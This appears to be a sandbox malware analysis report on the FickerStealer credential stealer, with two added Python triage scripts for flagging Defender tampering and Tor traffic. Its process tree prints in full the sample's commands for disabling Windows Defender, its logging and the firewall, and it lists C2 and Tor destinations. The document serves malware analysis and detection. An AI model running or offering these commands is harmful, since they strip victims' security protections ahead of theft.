Analysis Overview
SHA256
90929f4e6bd28d6a197fef323930502ac1a3dcc9de8d4dba02dc6702fd570e14
Threat Level: Known bad
The file FickerStealer.exe was found to be: Known bad.
Malicious Activity Summary
Contains code to disable Windows Defender
Modifies security service
Osiris
Modifies Windows Defender Real-time Protection settings
Executes dropped EXE
Modifies Windows Firewall
Drops startup file
Reads user/profile data of web browsers
Loads dropped DLL
JavaScript code in executable
Checks installed software on the system
Uses Tor communications
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates physical storage devices
Suspicious use of SetThreadContext
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-01-28 10:48
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-01-28 10:48
Reported
2021-01-28 10:50
Platform
win7v20201028
Max time kernel
66s
Max time network
52s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Osiris
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611834708978.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611834709056.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611834709056.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe | N/A |
Modifies Windows Firewall
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wsuj.exe | C:\Windows\SysWOW64\DllHost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611834709056.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611834709056.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
JavaScript code in executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Uses Tor communications
Enumerates physical storage devices
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1044 set thread context of 2016 | N/A | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611834709056.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe
"C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe"
C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe
"C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe"
C:\Users\Admin\AppData\Local\Temp\1611834708978.exe
"C:\Users\Admin\AppData\Local\Temp\1611834708978.exe"
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe
"C:\Users\Admin\AppData\Local\Temp\1611834709056.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\49BD.tmp\49BE.tmp\49BF.bat C:\Users\Admin\AppData\Local\Temp\1611834708978.exe"
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe
"C:\Users\Admin\AppData\Local\Temp\1611834709056.exe"
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "REG ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
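The process tree above is, in effect, a complete Defender-disabling script: Set-MpPreference switches, the Windows Defender policy keys, Start=4 on the WinDefend and Wd* services, the Defender scheduled tasks and ETW autologgers, the SecurityHealth Run entry and the firewall. The following is an added example and is not part of the sandbox report or its signature set: a Python rule set that classifies process command lines into those tampering categories, run over lines copied from the tree above plus three constructed benign lines. The rule names and the benign lines are the example's own. Typographic quotes are folded to ASCII before matching because PowerShell accepts them as string delimiters (the REG ADD “hklm\software\policies\microsoft\windows defender” variant above), so a rule that only looks for ASCII quotes misses that form.

```python
"""Flag Windows Defender / firewall tampering in process command lines.

Added example for this report, not the sandbox's own signature code.
"""
from __future__ import annotations

import re

# Typographic quotes survive when an operator pastes a script from a web page;
# PowerShell treats them as string delimiters, so fold them to ASCII first.
_QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2018": "'", "\u2019": "'"})


def normalize(cmdline: str) -> str:
    """Lower-case, fold smart quotes and collapse whitespace."""
    return " ".join(cmdline.translate(_QUOTES).split()).lower()


# (rule name, regex over the normalised command line); names are this example's own.
RULES = [
    ("defender_preference_disabled",
     r"set-mppreference\b.*-(disable\w+|signaturedisableupdateonstartupwithoutengine)\s+\$?true"),
    ("defender_cloud_reporting_off",           # MAPSReporting 0 / SubmitSamplesConsent 2 (never send)
     r"set-mppreference\b.*-(mapsreporting\s+0|submitsamplesconsent\s+2)"),
    ("defender_threat_action_allow",           # action 6 = Allow, for every severity level
     r"set-mppreference\b.*-(severe|high|moderate|low)threatdefaultaction\s+6"),
    ("defender_policy_registry",
     r'reg(\.exe)?"?\s+(add|delete)\s+"?hk(lm|ey_local_machine)\\software\\policies\\microsoft\\windows defender'),
    ("defender_service_disabled",              # Start=4 is SERVICE_DISABLED
     r'reg(\.exe)?"?\s+add\s+"?hklm\\system\\(currentcontrolset|controlset\d+)\\services\\'
     r'(windefend|wdboot|wdfilter|wdnisdrv|wdnissvc)"?\s+/v\s+"?start"?\s+/t\s+reg_dword\s+/d\s+"?4'),
    ("defender_task_disabled",
     r"schtasks\b.*/change\b.*(\\windows defender\\|exploitguard).*/disable"),
    ("defender_etw_logger_off",                # Start=0 silences the Defender ETW sessions
     r'autologger\\defender(api|audit)logger"?\s+/v\s+"?start"?\s+/t\s+reg_dword\s+/d\s+"?0'),
    ("defender_definitions_removed",
     r'mpcmdrun(\.exe)?"?\s+-removedefinitions'),
    ("defender_ui_removed",                    # SecurityHealth tray / EPP context menu handlers
     r'reg(\.exe)?"?\s+delete\s+.*(securityhealth|contextmenuhandlers\\epp)'),
    ("firewall_disabled",
     r"netsh\b.*advfirewall\s+set\s+allprofiles\s+state\s+off"),
]


def classify(cmdline: str) -> list[str]:
    """Return the names of every rule the command line trips, in RULES order."""
    text = normalize(cmdline)
    return [name for name, pattern in RULES if re.search(pattern, text)]


def triage(cmdlines) -> dict[str, list[str]]:
    """Group a batch of command lines by the rules they trip; benign lines drop out."""
    hits: dict[str, list[str]] = {}
    for line in cmdlines:
        for name in classify(line):
            hits.setdefault(name, []).append(line)
    return hits


# Command lines copied from the report's process tree.
REPORT_CMDLINES = [
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true',
    r'powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"',
    r'powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"',
    r'powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"',
    # the smart-quoted variant as the batch file ran it (U+201C / U+201D)
    'powershell.exe -command "REG ADD \u201chklm\\software\\policies\\microsoft\\windows defender\u201d /v DisableAntiSpyware /t REG_DWORD /d 1 /f"',
    r'"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off',
    r'reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f',
]

# Constructed benign lines that must trip nothing (not from the report).
BENIGN_CMDLINES = [
    r'powershell.exe -command "Get-MpPreference"',
    r'powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $false"',
    r'reg add "HKLM\Software\Contoso\Agent" /v Start /t REG_DWORD /d 4 /f',
]

if __name__ == "__main__":
    for rule, lines in triage(REPORT_CMDLINES + BENIGN_CMDLINES).items():
        print(f"{rule}: {len(lines)} hit(s)")
```

Matching on normalised command lines rather than on exact strings matters here: the same batch file issues each setting twice (once through Set-MpPreference, once through the policy registry key) and once more with different quoting, and a single tripped rule on any variant is enough to raise the alert. On a live host the same settings are verified with Get-MpPreference and Get-ItemProperty against the keys listed above.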
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 54.235.147.252:80 | api.ipify.org | tcp |
| N/A | 8.8.8.8:53 | mobilesuit.top | udp |
| N/A | 5.53.125.150:80 | mobilesuit.top | tcp |
| N/A | 5.53.125.150:80 | mobilesuit.top | tcp |
| N/A | 194.109.206.212:80 | N/A | tcp |
| N/A | 131.188.40.189:80 | 131.188.40.189 | tcp |
| N/A | 128.31.0.34:9131 | 128.31.0.34 | tcp |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 54.225.66.103:443 | api.ipify.org | tcp |
| N/A | 128.31.0.34:9131 | 128.31.0.34 | tcp |
| N/A | 66.111.2.131:9030 | 66.111.2.131 | tcp |
| N/A | 88.115.22.244:80 | 88.115.22.244 | tcp |
| N/A | 135.181.41.38:443 | N/A | tcp |
| N/A | 8.8.8.8:53 | time-a.nist.gov | udp |
| N/A | 129.6.15.28:13 | time-a.nist.gov | tcp |
| N/A | 128.39.8.29:80 | 128.39.8.29 | tcp |
| N/A | 185.233.186.146:80 | 185.233.186.146 | tcp |
| N/A | 185.112.144.20:80 | 185.112.144.20 | tcp |
| N/A | 160.119.249.223:80 | 160.119.249.223 | tcp |
| N/A | 185.191.124.151:443 | 185.191.124.151 | tcp |
| N/A | 45.154.255.75:80 | 45.154.255.75 | tcp |
| N/A | 104.218.63.75:443 | N/A | tcp |
| N/A | 199.249.230.83:80 | 199.249.230.83 | tcp |
| N/A | 50.7.74.173:80 | 50.7.74.173 | tcp |
| N/A | 127.0.0.1:32767 | N/A | tcp |
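The Network table supports two of the signatures directly. The DNS lookups and the HTTP and HTTPS connections to api.ipify.org are the external IP check, and the direct-to-IP connections to 128.31.0.34:9131, 194.109.206.212:80, 131.188.40.189:80 and 66.111.2.131:9030 land on Tor directory authorities (moria1, dizum, gabelmoo and the Serge bridge authority), which a Tor client contacts to fetch a consensus before it can build circuits. The example below is added here and is not part of the report: it parses rows in the table's own format and classifies each destination. The authority list is taken from the Tor source tree as of early 2021 (an assumption about currency; the list does change), the rows are a subset copied from the table above, and the category names are the example's own.

```python
"""Classify the destinations of a sandbox Network table.

Added example for this report; not from the sandbox vendor.
"""
from __future__ import annotations

import ipaddress
from collections import defaultdict

# Tor directory authorities plus the Serge bridge authority as (IP, DirPort),
# as listed in the Tor source (src/app/config/auth_dirs.inc) in early 2021.
# Assumption: still accurate for the traffic you analyse; refresh before use.
TOR_DIR_AUTHORITIES = {
    ("128.31.0.34", 9131): "moria1",
    ("86.59.21.38", 80): "tor26",
    ("194.109.206.212", 80): "dizum",
    ("131.188.40.189", 80): "gabelmoo",
    ("193.23.244.244", 80): "dannenberg",
    ("171.25.193.9", 443): "maatuska",
    ("199.58.81.140", 80): "longclaw",
    ("204.13.164.118", 80): "bastet",
    ("154.35.175.225", 80): "faravahar",
    ("66.111.2.131", 9030): "Serge (bridge authority)",
}

# Public "what is my IP" services; api.ipify.org is the one in the report.
EXTERNAL_IP_SERVICES = {"api.ipify.org"}


def parse_rows(table: str):
    """Yield (ip, port, domain_or_None, proto) from '| Country | Destination | Domain | Proto |' rows."""
    for line in table.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue                      # header row or malformed line
        _country, dest, domain, proto = cells
        ip, port = dest.rsplit(":", 1)
        # The sandbox repeats the IP in the Domain column when no name resolved.
        yield ip, int(port), (None if domain in ("", "N/A", ip) else domain), proto.lower()


def classify(ip: str, port: int, domain: str | None, proto: str) -> str:
    """Map one destination to a triage category."""
    if proto == "udp" and port == 53:
        return "dns_query"
    if domain is not None:
        return "external_ip_lookup" if domain in EXTERNAL_IP_SERVICES else "named_host"
    if (ip, port) in TOR_DIR_AUTHORITIES:
        return "tor_directory_authority"
    if ipaddress.ip_address(ip).is_loopback:
        return "loopback"
    # No DNS, not a known authority: relay traffic or raw-IP C2, not attributable here.
    return "direct_ip"


def triage_network(table: str) -> dict[str, list[str]]:
    """Group every row of the table by category, labelling authorities by name."""
    groups: dict[str, list[str]] = defaultdict(list)
    for ip, port, domain, proto in parse_rows(table):
        label = f"{ip}:{port}" + (f" ({domain})" if domain else "")
        if (ip, port) in TOR_DIR_AUTHORITIES:
            label += f" [{TOR_DIR_AUTHORITIES[(ip, port)]}]"
        groups[classify(ip, port, domain, proto)].append(label)
    return dict(groups)


# Subset of the report's Network table, copied in its own column order.
NETWORK_TABLE = """
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 54.235.147.252:80 | api.ipify.org | tcp |
| N/A | 8.8.8.8:53 | mobilesuit.top | udp |
| N/A | 5.53.125.150:80 | mobilesuit.top | tcp |
| N/A | 194.109.206.212:80 | N/A | tcp |
| N/A | 131.188.40.189:80 | 131.188.40.189 | tcp |
| N/A | 128.31.0.34:9131 | 128.31.0.34 | tcp |
| N/A | 66.111.2.131:9030 | 66.111.2.131 | tcp |
| N/A | 88.115.22.244:80 | 88.115.22.244 | tcp |
| N/A | 135.181.41.38:443 | | tcp |
| N/A | 8.8.8.8:53 | time-a.nist.gov | udp |
| N/A | 129.6.15.28:13 | time-a.nist.gov | tcp |
| N/A | 127.0.0.1:32767 | | tcp |
"""

if __name__ == "__main__":
    for category, dests in triage_network(NETWORK_TABLE).items():
        print(f"{category}: {', '.join(dests)}")
```

Only the authority hits are attributable from this table; the remaining direct connections on ports 80 and 443 are consistent with a client that has fetched a consensus and is talking to relays, but the same pattern fits raw-IP C2, so the example leaves them as direct_ip rather than calling them Tor.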
Files
memory/1044-2-0x0000000003730000-0x0000000003741000-memory.dmp
memory/2016-3-0x0000000000400000-0x0000000000448000-memory.dmp
memory/2016-4-0x0000000000401480-mapping.dmp
memory/2016-5-0x00000000760A1000-0x00000000760A3000-memory.dmp
memory/1580-6-0x000007FEF77C0000-0x000007FEF7A3A000-memory.dmp
memory/2016-8-0x0000000000400000-0x0000000000448000-memory.dmp
memory/1044-7-0x0000000000220000-0x0000000000265000-memory.dmp
\Users\Admin\AppData\Local\Temp\1611834708978.exe
| MD5 | c4384a44c4f624cfb9b52fbf8116b786 |
| SHA1 | 10b43504bef3b004ade71f99784b3bde4e324e8d |
| SHA256 | ef98f9fd8e48c339bbb625437f4a19966c58c47f0e79e99ac320027debb9c9c3 |
| SHA512 | 05fb9b58bdf76635d0d2e4d05e6ca76ad7423a91b87d0bf825471c3afe0d714e863f86090db8fb1734a571841c96eb13449bfef4c04bdba1efecb3e3db15eb32 |
memory/1484-10-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1611834708978.exe
| MD5 | c4384a44c4f624cfb9b52fbf8116b786 |
| SHA1 | 10b43504bef3b004ade71f99784b3bde4e324e8d |
| SHA256 | ef98f9fd8e48c339bbb625437f4a19966c58c47f0e79e99ac320027debb9c9c3 |
| SHA512 | 05fb9b58bdf76635d0d2e4d05e6ca76ad7423a91b87d0bf825471c3afe0d714e863f86090db8fb1734a571841c96eb13449bfef4c04bdba1efecb3e3db15eb32 |
\Users\Admin\AppData\Local\Temp\1611834709056.exe
| MD5 | 8e8f7ff797c292231959e4dd410a98da |
| SHA1 | 5fba19ae9f76b445d96dbca71f53113492b09d49 |
| SHA256 | ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b |
| SHA512 | c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27 |
memory/908-14-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe
| MD5 | 8e8f7ff797c292231959e4dd410a98da |
| SHA1 | 5fba19ae9f76b445d96dbca71f53113492b09d49 |
| SHA256 | ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b |
| SHA512 | c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27 |
\Users\Admin\AppData\Local\Temp\1611834709056.exe
| MD5 | 8e8f7ff797c292231959e4dd410a98da |
| SHA1 | 5fba19ae9f76b445d96dbca71f53113492b09d49 |
| SHA256 | ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b |
| SHA512 | c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27 |
memory/1484-17-0x0000000003110000-0x0000000003121000-memory.dmp
memory/616-19-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\49BD.tmp\49BE.tmp\49BF.bat
| MD5 | 2df9441936169e60a9631bf730cd4273 |
| SHA1 | 979ee79524023a77b9577d077a3472b87fda9834 |
| SHA256 | 24ab289fe2d2dd6e86d9862bf5dac0f6c78acc444eb083152b3eaf84e041f95e |
| SHA512 | ab1e894b85c731e9ce84e0cabbab493935bec18e352bd397cf8b3172bb817e9b174069122180d1fc2d9e538864c1cd77fd5c18ce8dd2a45434c9c045f2bf39ee |
memory/552-21-0x0000000000000000-mapping.dmp
memory/1672-22-0x0000000000000000-mapping.dmp
memory/1672-23-0x000007FEFB851000-0x000007FEFB853000-memory.dmp
memory/1484-24-0x0000000000230000-0x0000000000248000-memory.dmp
memory/1484-26-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1672-25-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp
memory/1672-27-0x0000000002590000-0x0000000002591000-memory.dmp
memory/1672-28-0x000000001AC70000-0x000000001AC71000-memory.dmp
memory/1672-29-0x0000000002480000-0x0000000002482000-memory.dmp
memory/1672-30-0x0000000002484000-0x0000000002486000-memory.dmp
memory/1672-31-0x00000000025D0000-0x00000000025D1000-memory.dmp
memory/1672-32-0x0000000002460000-0x0000000002461000-memory.dmp
memory/908-33-0x0000000000200000-0x000000000027B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe
| MD5 | 8e8f7ff797c292231959e4dd410a98da |
| SHA1 | 5fba19ae9f76b445d96dbca71f53113492b09d49 |
| SHA256 | ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b |
| SHA512 | c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27 |
memory/2024-37-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\1611834709056.exe
| MD5 | 8e8f7ff797c292231959e4dd410a98da |
| SHA1 | 5fba19ae9f76b445d96dbca71f53113492b09d49 |
| SHA256 | ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b |
| SHA512 | c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27 |
memory/2024-38-0x0000000000400000-0x000000000045A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1611834709056.exe
| MD5 | 8e8f7ff797c292231959e4dd410a98da |
| SHA1 | 5fba19ae9f76b445d96dbca71f53113492b09d49 |
| SHA256 | ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b |
| SHA512 | c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27 |
memory/908-42-0x0000000002F00000-0x0000000003080000-memory.dmp
memory/2024-43-0x00000000000B0000-0x00000000000B1000-memory.dmp
memory/2024-44-0x0000000000400000-0x000000000045A000-memory.dmp
memory/2024-45-0x00000000002D0000-0x0000000000379000-memory.dmp
\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
| MD5 | b4cd27f2b37665f51eb9fe685ec1d373 |
| SHA1 | 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0 |
| SHA256 | 91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581 |
| SHA512 | e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e |
